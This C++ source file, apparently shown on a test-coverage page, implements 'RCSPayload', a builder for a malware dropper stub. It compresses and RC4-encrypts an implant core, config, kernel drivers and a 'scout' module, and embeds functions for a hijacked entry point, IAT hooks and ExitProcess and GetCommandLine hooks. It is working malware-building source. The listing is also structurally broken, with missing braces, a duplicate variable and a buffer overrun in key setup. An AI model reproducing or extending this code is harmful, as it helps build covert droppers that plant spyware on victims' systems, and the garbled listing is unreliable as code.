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Test Coverage
#include <iomanip>
#include <list>
#include <string>
using namespace std;

#include <boost/shared_ptr.hpp>
#include <boost/filesystem/fstream.hpp>
namespace bf = boost::filesystem;

#include <aplib.h>

#include "../../RCSDropper/DropperCode.h"
#include "Components.h"
#include "RCSPayload.h"
#include "RCSConfig.h"

extern std::string productVersion;

#define OFFSET(x) do { *((DWORD*) x) = offset_(x); x += sizeof(DWORD); } while(0)

RCSPayload::RCSPayload( RCSConfig& rcs, Components& components, BOOL bScout, char *scout_name )
: rcs_(rcs), components_(components), cookedSize_(0)
    if (!bScout)
        cout << endl;
        cout << "Building dropper stub with following configuration" << endl;
        cout << endl;

        cout << "Core (32bit)   : " << rcs_.core() << endl;
        cout << "Core (64bit)   : " << (rcs_.core64().empty() ? "none" : rcs_.core64()) << endl;
        cout << "Config         : " << rcs_.config() << endl;
        cout << "Driver (32bit) : " << (rcs_.driver().empty() ? "none" : rcs_.driver()) << endl;
        cout << "Driver (64bit) : " << (rcs_.driver64().empty() ? "none" : rcs_.driver64()) << endl;
        cout << "Codec          : " << rcs_.codec() << endl;
        cout << "Install dir    : " << rcs_.directory() << endl;
        cout << "Manifest       : " << (rcs_.manifest() ? "true" : "false" ) << endl;
        cout << "Installer        : " << (rcs_.installer() ? "true" : "false" ) << endl;

        cout << endl;

        cout << "Core (32bit) size   : " << setw(8) << right << rcs_.core_size() << " bytes" << endl; 
        cout << "Core (64bit) size   : " << setw(8) << right << rcs_.core64_size() << " bytes" << endl;
        cout << "Config size         : " << setw(8) << right << rcs_.config_size() << " bytes" << endl;
        cout << "Driver (32bit) size : " << setw(8) << right << rcs_.driver_size() << " bytes" << endl;
        cout << "Driver (64bit) size : " << setw(8) << right << rcs_.driver64_size() << " bytes" << endl;
        cout << "Codec size          : " << setw(8) << right << rcs_.codec_size() << " bytes" << endl;

        cout << endl;

        unsigned int buffer_size = 
            alignToDWORD( sizeof(DataSectionHeader) )
            + rcs_.core_size()
            + rcs_.core64_size()
            + rcs_.config_size()
            + rcs_.driver_size()
            + rcs_.driver64_size()
            + rcs_.codec_size()
            + 69535; // account for strings, etc.

        cooked_.reset( new char[buffer_size] );

        char* ptr = cooked_.get();
        cout << __FUNCTION__ << " BASE ptr: 0x" << hex << (DWORD)ptr << endl;

        // HEADER
        DataSectionHeader* header = (DataSectionHeader*) ptr;
        memset(header, 0, sizeof(DataSectionHeader));
        header->isScout = 0;

        // RC4 key
        PBYTE encryptionKey = (PBYTE)malloc(32);
        for (ULONG i=0; i<64; i++)
            header->rc4key[i] = rand();

        ptr += sizeof(DataSectionHeader);
        cout << __FUNCTION__ << " HEADER ptr: 0x" << hex << (DWORD)ptr << endl;

        // MARKER
        DWORD offset = sizeof(DataSectionHeader);
        cout << "Sizeof DataSectionHeader: " << hex << offset << endl;
        memcpy(ptr, &offset, sizeof(offset));
        ptr += sizeof(offset);

        // HEADER -> cooker version
        cout << "VERSION => " << productVersion.c_str() << endl;
        memcpy(header->version, productVersion.c_str(), productVersion.length() + 1);
        cout << "INSTDIR => " << rcs_.directory().c_str() << endl;
        memcpy(header->instDir, rcs_.directory().c_str(), strlen(rcs_.directory().c_str()));
        cout << "EXPORTS => " << rcs_.func().c_str() << endl;
        memcpy(header->eliteExports, rcs_.func().c_str(), 21);

        //header->offsetToHeader = offset;

        // DROPPER CODE

        // entry point must always be the first function copied
        if (!rcs_.installer())
            ptr += embedFunction_(components.entryPoint(), header->functions.newEntryPoint, ptr);
            ptr += embedFunction_(components.coreThread(), header->functions.coreThread, ptr);
            ptr += embedFunction_(components.dumpFile(), header->functions.dumpFile, ptr);
            ptr += embedFunction_(components.hookIAT(), header->functions.hookIAT, ptr);
            ptr += embedFunction_(components.exitProcess(), header->functions.exitProcessHook, ptr);
            ptr += embedFunction_(components.rc4(), header->functions.rc4, ptr);
            ptr += embedFunction_(components.getCommandLineAHook(), header->functions.GetCommandLineAHook, ptr);
            ptr += embedFunction_(components.getCommandLineWHook(), header->functions.GetCommandLineWHook, ptr);

        // RCS FILES

        ptr += embedFile_(rcs.core(), header->files.names.core, header->files.core, ptr, header->rc4key);
        ptr += embedFile_(rcs.config(), header->files.names.config, header->files.config, ptr, header->rc4key);
        if ( rcs_.core64_size() ) {
            ptr += embedFile_(rcs.core64(), header->files.names.core64, header->files.core64, ptr, header->rc4key);
        if ( rcs_.codec_size() ) {
            ptr += embedFile_(rcs.codec(), header->files.names.codec, header->files.codec, ptr, header->rc4key);

        if ( rcs_.driver_size() ) 
            if ( rcs_.driver().filename() != string("none"))
                //if ( strcmp(rcs_.driver().filename().com .c_str(), "null") )
                ptr += embedFile_(rcs.driver(), header->files.names.driver, header->files.driver, ptr, header->rc4key);

        if (rcs_.driver64_size() ) 
            if ( rcs_.driver64().filename() != string("none"))
                ptr += embedFile_(rcs.driver64(), header->files.names.driver64, header->files.driver64, ptr, header->rc4key);

        cookedSize_ = ptr - cooked_.get();
        cout << __FUNCTION__ << " cooked size: " << cookedSize_ << endl;
    else // scout
        unsigned int buffer_size = 
            alignToDWORD( sizeof(DataSectionHeader) )
            + rcs_.core_size()
            + 69535; // account for strings, etc.

        cout << "Building dropper stub for scout, size: " << rcs_.core_size() << endl;

        cooked_.reset( new char[buffer_size] );
        char* ptr = cooked_.get();
        cout << __FUNCTION__ << " BASE ptr: 0x" << hex << (DWORD)ptr << endl;

        // HEADER
        DataSectionHeader* header = (DataSectionHeader*) ptr;
        memset(header, 0, sizeof(DataSectionHeader));
        header->isScout = 1; // SCOUT

        // RC4 key
        PBYTE encryptionKey = (PBYTE)malloc(32);
        for (ULONG i=0; i<64; i++)
            header->rc4key[i] = rand();

        ptr += sizeof(DataSectionHeader);
        cout << __FUNCTION__ << " HEADER ptr: 0x" << hex << (DWORD)ptr << endl;
        cout << __FUNCTION__ << " HEADER size: 0x" << hex << sizeof(DataSectionHeader) << endl;

        // HEADER -> cooker version
        memcpy(header->version, productVersion.c_str(), productVersion.length() + 1);

        // HEADER -> scout name
        memcpy(header->eliteExports, scout_name, strlen(scout_name)+1);


        ptr += embedFunction_(components.entryPoint(), header->functions.newEntryPoint, ptr); 
        ptr += embedFunction_(components.hookIAT(), header->functions.hookIAT, ptr); 
        ptr += embedFunction_(components.rc4(), header->functions.rc4, ptr);
        ptr += embedFunction_(components.load(), header->functions.load, ptr);
        ptr += embedFunction_(components.exitProcess(), header->functions.exitProcessHook, ptr);
        ptr += embedFunction_(components.getCommandLineAHook(), header->functions.GetCommandLineAHook, ptr);
        ptr += embedFunction_(components.getCommandLineWHook(), header->functions.GetCommandLineWHook, ptr);

        ptr += embedFile_(rcs.core(), header->files.names.core, header->files.core, ptr, header->rc4key);
        cookedSize_ = ptr - cooked_.get();
        cout << __FUNCTION__ << " cooked size: " << cookedSize_ << endl;


std::size_t RCSPayload::embedFunction_( const DataBuffer& source, DataSectionBlob& func, char *ptr )
    if (source.size) {
        func.size = (DWORD) source.size;
        memcpy(ptr, source.data.get(), func.size);
        func.offset = ((DWORD)ptr - (DWORD)cooked_.get());
    cout << __FUNCTION__ << " size: " << alignToDWORD( source.size ) << endl;
    return alignToDWORD( source.size );

unsigned int ratio(unsigned int x, unsigned int y)
    if (x <= UINT_MAX / 100) x *= 100; else y /= 100;
    if (y == 0) y = 1;
    return x / y;

int __stdcall callback(unsigned int insize, unsigned int inpos, unsigned int outpos, void *cbparam)
    printf("\rcompressed %u -> %u bytes (%u%% done)", inpos, outpos, ratio(inpos, insize));
    return 1;

void rc4_encrypt(
    const unsigned char *key, 
    size_t keylen, 
    size_t skip,
    unsigned char *data, 
    size_t data_len)
    unsigned int i, j, k;
    unsigned char *pos;
    size_t kpos;
    unsigned char *S = (unsigned char*) malloc(256);
    /* Setup RC4 state */
    for (i = 0; i < 256; i++)
        S[i] = i;
    j = 0;
    kpos = 0;
    for (i = 0; i < 256; i++) {
        j = (j + S[i] + key[kpos]) & 0xff;
        if (kpos >= keylen)
            kpos = 0;
        S_SWAP(i, j);
    /* Skip the start of the stream */
    i = j = 0;
    for (k = 0; k < skip; k++) {
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        S_SWAP(i, j);
    /* Apply RC4 to data */
    pos = data;
    for (k = 0; k < data_len; k++) {
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        S_SWAP(i, j);
        *pos++ ^= S[(S[i] + S[j]) & 0xff];


std::size_t RCSPayload::embedFile_(const bf::path& path, DataSectionBlob& name, DataSectionCryptoPack& file, char* ptr, char *key)
    // TODO move to auto pointers

    std::size_t size = (DWORD) bf::file_size(path);
    cout << __FUNCTION__ << " file size: " << size << " for " << path << endl;
    if (size == 0)
        return 0;
    // save original size
    file.original_size = size;

    // save name of file
    char* p = ptr;
    name.offset = ((DWORD)p - (DWORD)cooked_.get());
    std::string filename = path.filename();
    cout << __FUNCTION__ << " file name size: " << filename.size() << endl;
    name.size = (DWORD) filename.size() + 1;
    memcpy(ptr, filename.c_str(), name.size);
    p += name.size;
    // open file
    file.offset = ((DWORD)p - (DWORD)cooked_.get());
    bf::ifstream fs;
    fs.open(path, ios::in | ios::binary);
    // read file

    char* buf = new char[size];

    fs.read(buf, size);
    std::size_t n = fs.gcount();
    // compress data
    char* packed = new char[aP_max_packed_size(size)];
    char *workmem = new char[aP_workmem_size(size)];
    int packed_size = aP_pack(buf, packed, size, workmem, callback, NULL);
    if (packed_size == APLIB_ERROR) {
        printf("Error compressing!\n");
        return 0;
    char *packed = buf;
    int packed_size = size;
    rc4_encrypt((unsigned char*)key, RC4KEYLEN, 0, (unsigned char *)packed, packed_size);
    //delete [] buf;
    // save compressed size
    file.size = packed_size;
//    if (workmem) {
//        delete [] workmem;
//        workmem = NULL;
//    }
    // encrypt

    // write compressed to buffer
    memcpy(p, packed, packed_size);

    p += packed_size;

    delete [] packed;
    std::size_t ret = ((DWORD)p - (DWORD)ptr);
    cout << __FUNCTION__ << " size: " << dec << ret << endl;
    return ret;

std::size_t RCSPayload::embedStrings_( RCSConfig &rcs, DataSectionHeader* header, char* ptr )
    char* p = ptr;
    std::list<std::string> strings;

    // add installation directory

    // copy all dropper strings
//    int i = 0;
//    while (_needed_strings[i] != NULL) {
//        strings.push_back(std::string(_needed_strings[i]));
//        i++;
//    }
    // reserve space for string offsets
    header->stringsOffsets.offset = offset_(p);
    DWORD * strOffset = (DWORD *) p;
    p += strings.size() * sizeof(DWORD);
    header->strings.offset = offset_(p);
    unsigned int idx = 0;
    for ( std::list<std::string>::iterator iter = strings.begin();
        iter != strings.end(); 
        iter++, idx++ )
        // store offset of string
        DWORD offset =  offset_(p) - header->strings.offset; 
        (*strOffset) = offset;

        // store string data
        (void) memcpy( p, (*iter).c_str(), (*iter).size() + 1);
        if (idx == STRIDX_COMMAHFF8)
            memcpy(p+2, rcs.func().c_str(), 6);
        else if (idx == STRIDX_HFF5)
            memcpy(p, rcs.func().c_str(), 6);

        cout << __FUNCTION__ << " embedding string: " << p << " [" << (*iter).size() + 1 << " bytes]" << endl;
        p += (*iter).size() + 1;
    header->strings.size = offset_(p) - header->strings.offset;
    std::size_t ret = ((DWORD)p - (DWORD)ptr);
    cout << __FUNCTION__ << " size: " << ret << endl;
    return ret;

std::size_t RCSPayload::embedDllCalls_( DataSectionHeader* header, char* ptr )
    char* p = ptr;

    // Calls
    header->dlls.offset = p - cooked_.get();
    DWORD totalCalls = 0;
    for ( int i = 0; data_imports[i].dll; i++ )
        // account for nCalls field
        char* ptrToNCalls = p;
        p += sizeof(DWORD);

        // dll name
        (void) memcpy( p, data_imports[i].dll, strlen(data_imports[i].dll) + 1 );
        cout << __FUNCTION__ << " DLL: " << p << endl;
        p += (UINT)strlen(data_imports[i].dll) + 1;

        // copy call names
        DWORD nCalls = 0;
        for ( int iD = 0; data_imports[i].calls[iD] != NULL; iD++ )
            (void) memcpy( p, data_imports[i].calls[iD], strlen(data_imports[i].calls[iD]) + 1);
            cout << __FUNCTION__ << " - call: " << p << endl;
            p += (UINT)strlen(data_imports[i].calls[iD]) + 1;
        // fill nCalls field
        memcpy(ptrToNCalls, &nCalls, sizeof(nCalls));
        totalCalls += nCalls;
    header->dlls.size = p - (cooked_.get() + header->dlls.offset);
    cout << __FUNCTION__ << " total calls: " << totalCalls << endl;
    // reserve space for Dll callst addresses
    header->callAddresses.offset = p - cooked_.get();
    header->callAddresses.size = totalCalls * sizeof(DWORD);
    cout << __FUNCTION__ << " reserving " << header->callAddresses.size << " bytes for call addresses." << endl;
    p += header->callAddresses.size;
    std::size_t ret = ((DWORD)p - (DWORD)ptr);
    cout << __FUNCTION__ << " size: " << ret << endl;
    return ret;

bool RCSPayload::write( bf::path file )
    bf::ofstream of(file, ios::out | ios::binary);
    of.write(cooked_.get(), cookedSize_);
    return true;